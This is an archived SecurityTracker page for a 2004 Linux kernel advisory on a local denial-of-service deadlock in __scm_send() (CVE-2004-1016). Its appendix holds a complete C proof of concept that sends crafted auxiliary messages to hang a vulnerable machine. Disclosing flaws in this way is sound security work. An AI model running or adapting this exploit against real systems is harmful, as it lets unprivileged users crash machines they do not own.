SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Linux)  >   Linux Kernel Vendors:   kernel.org
Linux Kernel Auxiliary Message Layer State Error Lets Local Users Deny Service
SecurityTracker Alert ID:  1012527
SecurityTracker URL:  http://securitytracker.com/id/1012527
CVE Reference:   CVE-2004-1016   (Links to External Site)
Date:  Dec 15 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
Description:   A vulnerability was reported in the Linux kernel in the auxiliary message (scm) layer. A local user can cause denial of service conditions.

Paul Starzetz of iSEC Security Research reported that a local user can send a specially crafted auxiliary message to a socket to trigger a deadlock condition in the __scm_send() function.

The report indicates that it may be possible to gain elevated privileges on the 2.6 kernel, but this is not confirmed in the report.

A demonstration exploit is available at:

http://isec.pl/vulnerabilities/isec-0019-scm.txt

Impact:   A local user can cause the target system to hang.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.kernel.org/ (Links to External Site)
Cause:   State error

Message History:   None.


 Source Message Contents

Subject:  Linux kernel scm_send local DoS


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Linux kernel scm_send local DoS
Product:   Linux kernel
Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
CVE:       CAN-2004-1016
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      Dec 14, 2004


Issue:
======

A  locally  exploitable  flaw  has been found in the Linux socket layer,
that allows a local user to hang a vulnerable machine.


Details:
========

The Linux kernel provides a powerful socket API  to  user  applications.
Among other functions sockets provide an universal way for IPC and user-
kernel communication. The socket layer uses several  logical  sublayers.
One  of  the  layers,  so called auxiliary message layer (or scm layer),
augments the socket API by  an  universal  user-kernel  message  passing
capability (see recvfrom(2) for more details on auxiliary messages).

One  of  the  scm  message  parsing  functions  invoked  from the kernel
sendmsg() code is __scm_send() and suffers from a deadlock condition  if
carefully  prepared  auxiliary  message(s)  is  sent  to  a socket by an
unprivileged application.

We believe that the 2.4 kernel branch is not  further  exploitable.  The
2.6  branch  has not been extensively checked, however it may be locally
exploitable to gain elevated privileges due to its increased complexity.


Discussion:
=============

See attached code.


Impact:
=======

Unprivileged local users may hang a vulnerable Linux machine.


Credits:
========

Paul  Starzetz  <ihaquer@isec.pl>  has  identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF
INFORMATION  PRESENTED  HERE  IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This document and all the information it contains are provided "as  is",
for  educational  purposes  only,  without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the  topicality,
correctness,  completeness  or  quality  of the information  provided in
this document. Liability claims regarding damage caused by  the  use  of
any  information  provided,  including  any kind of information which is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 *	Linux kernel 2.4 & 2.6 __scm_send DoS
 *	Warning! this code will hang your machine
 *
 *      gcc -O2 scmbang.c -o scmbang
 *
 *      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *      THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *      AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *      WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>



static char buf[1024];



void
fatal (const char *msg)
{
    printf ("\n");
    if (!errno)
      {
	  fprintf (stderr, "FATAL: %s\n", msg);
      }
    else
      {
	  perror (msg);
      }
    printf ("\n");
    fflush (stdout);
    fflush (stderr);
    exit (1);
}


int
main (void)
{
    int s[2], r;
    struct sockaddr_in sin;
    struct msghdr *msg;
    struct cmsghdr *cmsg;

    r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
    if (r < 0)
	fatal ("socketpair");

    memset (buf, 0, sizeof (buf));
    msg = (void *) buf;
    msg->msg_control = (void *) (msg + 1);

// make bad cmsgs
    cmsg = (void *) msg->msg_control;

    cmsg->cmsg_len = sizeof (*cmsg);
    cmsg->cmsg_level = 0xdeadbebe;
    cmsg->cmsg_type = 12;	// len after overflow on second msg
    cmsg++;

// -12 for deadlock
    cmsg->cmsg_len = -12;
    cmsg->cmsg_level = SOL_IP;
    msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
    r = sendmsg (s[0], msg, 0);
    if (r < 0)
	fatal ("sendmsg");

    printf ("\nYou lucky\n");
    fflush (stdout);

    return 0;
}

- -- 
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH
ZB8QMKmLVyKaQ5fvN/l8mL8=
=2hQr
-----END PGP SIGNATURE-----


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC